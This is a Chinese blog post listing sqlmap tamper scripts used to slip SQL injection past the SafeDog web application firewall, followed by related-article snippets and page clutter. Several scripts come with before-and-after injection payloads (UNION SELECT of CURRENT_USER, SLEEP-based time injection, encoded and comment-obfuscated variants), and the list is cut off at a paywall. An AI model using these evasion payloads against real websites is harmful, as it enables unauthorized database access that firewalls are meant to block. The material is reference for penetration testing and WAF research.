sqlmap脚本绕安全狗

最新推荐文章于 2024-05-14 01:00:47 发布
最新推荐文章于 2024-05-14 01:00:47 发布
阅读量4.1k 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hq_Dream/article/details/50461861
版权


脚本名:apostrophemask.py

作用:用utf8代替引号《Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'


作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

Example:
 
( "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa" ) "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
脚本名:space2morehash.py
作用:在有效负荷结束位置加载零字节字符编码
Example: ( 'IFNULL(1, 2)' ) 'IF(ISNULL(1),2,1)'

脚本名:space2mssqlblank.py(mssql)

Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers

Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005

ASCII table:

案例一: wooyun.org/bugs/wooyun-2010-062878

脚本名:base64encode.py

作用:用base64编码替换 Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

案例一: http://wooyun.org/bugs/wooyun-2010-060071

案例二: http://wooyun.org/bugs/wooyun-2010-021062

案例三: http://wooyun.org/bugs/wooyun-2010-043229

脚本名:space2mssqlhash.py

作用:替换空格

1
Example: ( '1 AND 9227=9227' ) '1%23%0AAND%23%0A9227=9227' Requirement: * MSSQL * MySQL

脚本名:modsecurityversioned.py

作用:过滤空格,包含完整的查询版本注释

1
Example: ( '1 AND 2>1--' ) '1 /*!30874AND 2>1*/--'

Requirement: * MySQL

Tested against:

  • MySQL 5.0

脚本名:space2mysqlblank.py

作用:空格替换其它空白符号(mysql)

1
2
3
4
5
Example:
 
* Input: SELECT id FROM users
 
* Output : SELECT %0Bid%0BFROM%A0users

Requirement:

  • MySQL

Tested against:

  • MySQL 5.1

案例一:wooyun.org/bugs/wooyun-2010-076735

脚本名:between.py

作用:用between替换大于号(>)
最低0.47元/天 解锁文章
Qclover
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqlmap过过滤的 tamper 脚本分类汇总
10-19
sqlmap过过滤的 tamper 脚本分类汇总,包括所有的数据库的过来脚本汇总
Python脚本SQLMapTamper脚本——安全狗
weixin_55205599的博客
10-18 473
针对WAF编写Tamper脚本进行过安装网站安全狗,此时再次尝试SQL注入时,安全狗会拦截。
19.sqlmap饶过waf安全狗
weixin_46525626的博客
07-13 768
因为大都是通过的方式进行拦截,所以如果出现了被拦截的情况,大概率是因为你的语句的触发了黑名单的验证机制,导致被拦截,那应该怎么检测呢?其实就行了,输入页面,如下说明“and 1”这个部分触发了拦截,此时的过方式可以选择替换或者过,这里我们先试试对中间的空格进行替换,空格的替换方式尤其多,我们不可能全部都能记住,所以这里就要FUZZ过方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP过的情况。
最新sqlmap工具的使用 (超详细附工具版)_python sqlmap(1),2024年最新面试大厂应该注意哪些问题
最新发布
2401_84141304的博客
05-14 396
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。最近我才对这些路线做了一下新的更新,知识体系更全面了。
手把手教你编写SQLMapTamper脚本过狗
蚁景网安学院
02-22 591
https://xz.aliyun.com/t/11412sql注入bypass最新版某狗 (qq.com)奇安信攻防社区-记一次实战过狗注入 (butian.net)https://www.freebuf.com/sectool/179035.html本文仅用于技术讨论与学习测试环境最新版某狗测试方法安全狗其实是比较好的WAF,过方法很多,但这里我们就用一种:注释混淆一招鲜吃遍天注释混淆,其...
sqlmap安全狗
qq_50854662的博客
01-05 6045
sqlmap安全狗
SQLmap过waf的脚本详解
一杯咖啡的渗透记忆
11-15 1947
使用方法--tamper xxx.py apostrophemask.py 用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py 在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 bet...
渗透测试必备神器SQLMAP的所有waf脚本合集
10-18
在对抗Web应用防火墙(WAF)时,SQLMAP提供了一系列的过策略和脚本。WAF通常设置规则来阻挡已知的攻击模式,但SQL注入的灵活性使其能够避开这些静态防御。SQLMAP通过自动化的智能探测和多种技术,如盲注、时间延迟...
sqlmap脚本
03-08
在标题中提到的"sqlmap安全狗脚本"表明这是一个针对安全狗(Security Dog)这种Web应用防火墙的特殊配置或技巧,目的是使SQLMap的攻击能够穿透安全狗的防护。 安全狗是一种常见的服务器和网站安全防护软件,它...
SQLMap完成安全测试
03-03
sqlmap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入漏洞并接管数据库服务器。它有一个强大的检测引擎,许多适合于终极渗透测试的良好特性和众多的操作选项,从数据库指纹、数据获取到访问底层文件系统...
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
【sql注入-WAF过】编写sqlmaptamper进行sql注入
06-29 6077
【特征】特殊符号+十六进制格式
SQLMAP脚本-sql-labs-Less-30-34
m0_69844818的博客
01-04 432
和上一关一样先使用上一关的脚本跑一下发现跑不出来了,看一下后端代码按道理只是把单引号换成了双引号,sqlmap应该是会尝试双引号注入但我怎么跑都跑步出来,尝试在脚本里面手动替换双引号。
sqlmap的高级使用-tamper脚本使用、os-shell原理等
weixin_46626737的博客
07-11 703
(10)concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例。(5)between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=(14)ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例。
SQLMapTamper脚本
m0_62207482的博客
01-31 2953
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的过方法。
sqlmaptamper的用法
路虽远,行将至。事虽难,做必达。
03-09 1万+
sqlmap部分脚本用法说明 1、apostrophemask.py 适用数据库:ALL 作用:将引号替换为utf-8,用于过滤单引号 使用脚本前:tamper("1 AND '1'='1") 使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 2、base64encode.py 适用数据库:ALL 作用:替换base64编码 使用脚本前:tamper("1' AND SLEEP(5)#") 使用脚本后:MScgQU5EIFNMRUVQKDUpIw==
routeros入门到精通v6.3.7e_sqlmap从入门到精通第七章71 过WAF脚本apostrophemask.py
weixin_39643679的博客
11-26 263
7.7 sqlmap使用tamper过WAF7.7.1 tamper简介1. tamper简介sqlmap压缩包解压后根目录下有个tamper的文件夹,里面有58个python脚本,其中剔除__init__.py这个文件就含有57个脚本,这些脚本对应不同的过WAF的功能模块2. tamper脚本使用tampersqlmap过功能,使用方式:python sqlmap.py --t...
SQLMap使用教程:从入门到入狱详细指南
qq_61553520的博客
04-14 5743
本文会主要介绍SQLMap的使用,包括常用的参数,常用的语句,以及常用的功能。
p79 Python 开发-sqlmapapi&Tamper&Pocsuite(含安全狗的安装与开启网站防护)
weixin_43263566的博客
03-10 1108
Python 开发-sqlmapapi&Tamper&Pocsuite
sqlmap安全狗
08-25
对于安全狗的问题,我必须强调尊重法律和道德规范,不鼓励或提供任何违法或不当的行为。安全狗等安全措施是非法的,并可能导致法律后果。 如果您是合法授权的安全测试人员,可以基于合法的测试范围和授权...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值